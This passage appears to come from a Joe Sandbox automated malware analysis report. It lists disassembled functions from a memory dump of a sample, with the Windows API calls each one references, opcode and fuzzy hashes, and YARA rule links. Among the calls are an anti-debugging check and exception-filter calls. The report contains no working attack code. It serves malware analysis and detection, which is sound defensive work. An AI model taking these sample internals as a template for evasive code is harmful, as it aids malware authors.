IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00CD8FB5
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00CD8FBF
UnhandledExceptionFilter.KERNEL32(-00000325,?,?,?,?,?,00000000), ref: 00CD8FCC

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 68bf085cc23acf33f68f062f89c1e077e4f8bddcc4783e042a55e53031fdaed5
Instruction ID: 88ade8a8162dfe49bfa684a2522f8613e8691d5f182b86f44c8fe9b0adf62680
Opcode Fuzzy Hash: 68bf085cc23acf33f68f062f89c1e077e4f8bddcc4783e042a55e53031fdaed5
Instruction Fuzzy Hash: 5331A275901229ABCB21DF64DC89B9DBBB8AF48310F5041EEE41CA7250EB709F859F54

Function 00CDB348 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON

Download Yara Rule

Strings

., xrefs: 00CDB4DB

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID:
String ID: .
API String ID: 0-248832578
Opcode ID: 8d153712cad94ca5ee98eebd05ab11eea2f48940f592b6f13efa06434717895b
Instruction ID: 6180400cd47e0e130678700a7ed220e794a9e9dc2134c5983b066111047ed318
Opcode Fuzzy Hash: 8d153712cad94ca5ee98eebd05ab11eea2f48940f592b6f13efa06434717895b
Instruction Fuzzy Hash: AB312671800249AFCB24DE78CC84EFB7BBDDB85304F0541AEEA2887352EB309E419B50

Function 00CDD440 Relevance: 3.5, APIs: 2, Instructions: 464COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
Instruction ID: 980ca96c7679c943de4c07a88632a69605a85e081956e5fa3a1121a96cf6e663
Opcode Fuzzy Hash: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
Instruction Fuzzy Hash: 45020D71E002199FDF14CFA9D9806ADB7F1EF48314F2581AAE91AE7384D731AE41CB90

Function 00CCAF0F Relevance: 3.0, APIs: 2, Instructions: 45COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00CCAF35
GetNumberFormatW.KERNEL32(00000400,00000000,?,00CEE72C,?,?), ref: 00CCAF84

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: FormatInfoLocaleNumber
String ID:
API String ID: 2169056816-0
Opcode ID: 1bcd768c9ccb62624f0bdf35cc475bdd50c366fb94a0815402d7b94b04efe5e6
Instruction ID: 596583e5c1d72ea34aacd5dd7d6d3c7c9e0d69c8c503f791b87b968fedbc7f51
Opcode Fuzzy Hash: 1bcd768c9ccb62624f0bdf35cc475bdd50c366fb94a0815402d7b94b04efe5e6
Instruction Fuzzy Hash: 7C01217A100348AAD710DF65DC89F9F77BCEF09750F105426FA09DB290D370A965CBA5

Function 00CB6C74 Relevance: 3.0, APIs: 2, Instructions: 16windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00CB6DDF,00000000,00000400), ref: 00CB6C74
FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 00CB6C95

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: ab5b7a2891ff0be96f149bfd2ba81026443bb326a025b1dc109b7d45eef6a0e4
Instruction ID: e6ad401f4cecc8c67902dd9cdc904b07343fe360633fc30482cad0a680511a66
Opcode Fuzzy Hash: ab5b7a2891ff0be96f149bfd2ba81026443bb326a025b1dc109b7d45eef6a0e4
Instruction Fuzzy Hash: A7D0C731344340BFFA110F618D4AF6E7F59FF45B91F14C4147755D90E0C6789514AA15

Function 00CE19F4 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00CE19EF,?,?,00000008,?,?,00CE168F,00000000), ref: 00CE1C21

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: bcdda834ac2f0b295a2de82adb38f87ff7d6a2be4ae03525250ccc1415b894c8
Instruction ID: b32905a240701a69d4fdc3a7ee5258a2e41b44f1c34a03b6d9b525843429fe4f
Opcode Fuzzy Hash: bcdda834ac2f0b295a2de82adb38f87ff7d6a2be4ae03525250ccc1415b894c8
Instruction Fuzzy Hash: 42B15E71610648DFD715CF29C48AB657BE0FF45364F298658ECAACF2A1C335EAA1CB40

Function 00CCF654 Relevance: 1.6, APIs: 1, Instructions: 147COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00CCF66A

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: 1f5e63e72393bcd162af2acf024d444ad1be72cf67689a423565f33b3d4d600a
Instruction ID: b7472323d2fdb5548a72eada0c55b469caa78eff3161398f0b69fc41577d293b
Opcode Fuzzy Hash: 1f5e63e72393bcd162af2acf024d444ad1be72cf67689a423565f33b3d4d600a
Instruction Fuzzy Hash: DA5180B19006199FDB28CF54E881BAEB7F5FB48354F24853ED415EB391D7749A02CB60

Function 00CBB146 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

GetVersionExW.KERNEL32(?), ref: 00CBB16B

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: Version
String ID:
API String ID: 1889659487-0
Opcode ID: 5b880b4af196d102bda2dfc6b64bf9257322eb639113cb4dfe791047c12a60c3
Instruction ID: 777c659947ce3ac0bb87b6c6ba554240d66c98d0f7d36ba43f941b3059bec88b
Opcode Fuzzy Hash: 5b880b4af196d102bda2dfc6b64bf9257322eb639113cb4dfe791047c12a60c3
Instruction Fuzzy Hash: 0DF017B5E00248CFDB18CB18EC96BED77F1EB88315F144296D92593390C7B0AE80CE61

Function 00CB40FE Relevance: 1.5, Strings: 1, Instructions: 276COMMON

Download Yara Rule

Strings

gj, xrefs: 00CB41BC

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID:
String ID: gj
API String ID: 0-4203073231
Opcode ID: 0493c95cc03e8c3cc3cf79e607424e9c9d6508f6b90dab76b565b8ae1b0d27a1
Instruction ID: 9a60d20ca7e94cff03141fabe8eaf9ea6a508c4f534aeeb39c48992d7af36999
Opcode Fuzzy Hash: 0493c95cc03e8c3cc3cf79e607424e9c9d6508f6b90dab76b565b8ae1b0d27a1
Instruction Fuzzy Hash: 82C12676A183818FC354CF29D88065AFBE1BFC8308F19892DE998D7311D734E955CB96

Function 00CCF9D5 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_0001F9F0,00CCF3A5), ref: 00CCF9DA

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 1d89c80142c5ac8a4044f66c23b99acfc1d2a01caeb0725b91f1ccc934cc1250
Instruction ID: 637e7a410efcf2106ccd38bd8a733236dbd0d2a4c64d8967de23d4bfa984a7ca
Opcode Fuzzy Hash: 1d89c80142c5ac8a4044f66c23b99acfc1d2a01caeb0725b91f1ccc934cc1250
Instruction Fuzzy Hash:

Function 00CDC030 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00CDC030

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 7611887fea3ca673ad40ea98975aa129d9222ee605567e5a59a431f30f09e40a
Instruction ID: bb24a6b4159a2b7c9bfaec9ffe70d57907e3a47888307723690f8118c253079f
Opcode Fuzzy Hash: 7611887fea3ca673ad40ea98975aa129d9222ee605567e5a59a431f30f09e40a
Instruction Fuzzy Hash: CEA012301012409B8300CF305E4C35C36A4950029030440199004C5160DA2040605600

Function 00CC62CA Relevance: .8, Instructions: 829COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6eb7e628c131b77d64230efdf3487e18faf11e64f64428999ea75b77c32f4a9
Instruction ID: 049ed794fbff18eea00cb8fbaa672f541636b5d270cfa91906d2b1b8cbaedcf8
Opcode Fuzzy Hash: b6eb7e628c131b77d64230efdf3487e18faf11e64f64428999ea75b77c32f4a9
Instruction Fuzzy Hash: 0462F8716047849FCB25CF28C590BB9BBE1BF95304F08896DE8EA8B346D734EA45DB11

Function 00CC77EF Relevance: .8, Instructions: 817COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea09b33de8b9cfbb8209bfa1a333bac43e177ce32cd9c289141a45ee596f7016
Instruction ID: 0cf18f4558e3e7783f7eb8eed3cb925c2f3044f917835b2ecbaa85482bcae098
Opcode Fuzzy Hash: ea09b33de8b9cfbb8209bfa1a333bac43e177ce32cd9c289141a45ee596f7016
Instruction Fuzzy Hash: EE62D8716083458FCB15CF28C890AB9BBE1FF95304F188A6DE9AA8B346D730E945CF55

Function 00CBF461 Relevance: .7, Instructions: 694COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1878276514fa88b4dc78be59b3a11d6ef0ca78ea051cd932ee5a1b4ffb735fc3
Instruction ID: f71084d9a0ac9112883f08a1bf86c8979afdede626dc5e3cb3e20dd17f3ab2cf
Opcode Fuzzy Hash: 1878276514fa88b4dc78be59b3a11d6ef0ca78ea051cd932ee5a1b4ffb735fc3
Instruction Fuzzy Hash: 61522972A187018FC718CF19C891A6AF7E1FFCC304F498A2DE5959B255D334EA19CB86

Function 00CC7153 Relevance: .5, Instructions: 536COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd402d5c17cccce2969f2ad70d2b00b4cc7774edef450237b63e45765ac801da
Instruction ID: fc61fd463d46e5a5184a92609f87a4c317fecae6ee3d46be6eb4255c4649d7af
Opcode Fuzzy Hash: dd402d5c17cccce2969f2ad70d2b00b4cc7774edef450237b63e45765ac801da
Instruction Fuzzy Hash: FC12BFB16187069FC718CF28C890BB9B7E1FB94304F148A2EE996C7681E334E995DF45

Function 00CBC426 Relevance: .5, Instructions: 454COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6161e6826ed8594f34f9992fb08e9bb7d56606ed244211630d24eb993db36469
Instruction ID: 5485154e83eeb45f6fb2e1a7fa718bebdbd88948fda3161802a491fb1adc4599
Opcode Fuzzy Hash: 6161e6826ed8594f34f9992fb08e9bb7d56606ed244211630d24eb993db36469
Instruction Fuzzy Hash: 54F19971A083018FD718CF29C4C4AAEBBE5EFDA314F144A2EF4A597251D730EA45CB42

Function 00CBE9B7 Relevance: .3, Instructions: 320COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 658a36decd893c650e87ed1563ff6c113b2068c8530b6f65ab00a57648948d60
Instruction ID: 4c24eb942d038fd4f413782d0328fb63c2ef9d2b0a4c05211e5baea01e4ec363
Opcode Fuzzy Hash: 658a36decd893c650e87ed1563ff6c113b2068c8530b6f65ab00a57648948d60
Instruction Fuzzy Hash: 61E158755083948FC304CF29D8849AEBFF0AF9A304F45495EFAD497352C235EA19DBA2

Function 00CC4088 Relevance: .3, Instructions: 270COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3e033f5a90b6653f2820811019e1f3a5f035301b3a61585745d11b019002b2e
Instruction ID: af5fde13370a3de3035173f3cb953360fd947ee578d37fbc30e480a9553677a6
Opcode Fuzzy Hash: c3e033f5a90b6653f2820811019e1f3a5f035301b3a61585745d11b019002b2e
Instruction Fuzzy Hash: 0D9137B02003459BDB2CEE64E8A1FFE77D5EB90300F14892DF9D6C72C2DA649646D752

Function 00CC43BF Relevance: .2, Instructions: 243COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
Instruction ID: bf30c9ab6dc999d2e0c4aef784282351f6c03c9f0c99098c0f99888b5b1a00dd
Opcode Fuzzy Hash: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
Instruction Fuzzy Hash: B0815BB13043464BDB2DDF68D8E0FBD37D4AB90304F10892DF9D68B6C2DA7489869756

Function 00CD51C9 Relevance: .2, Instructions: 237COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID:
String ID:
API String ID:
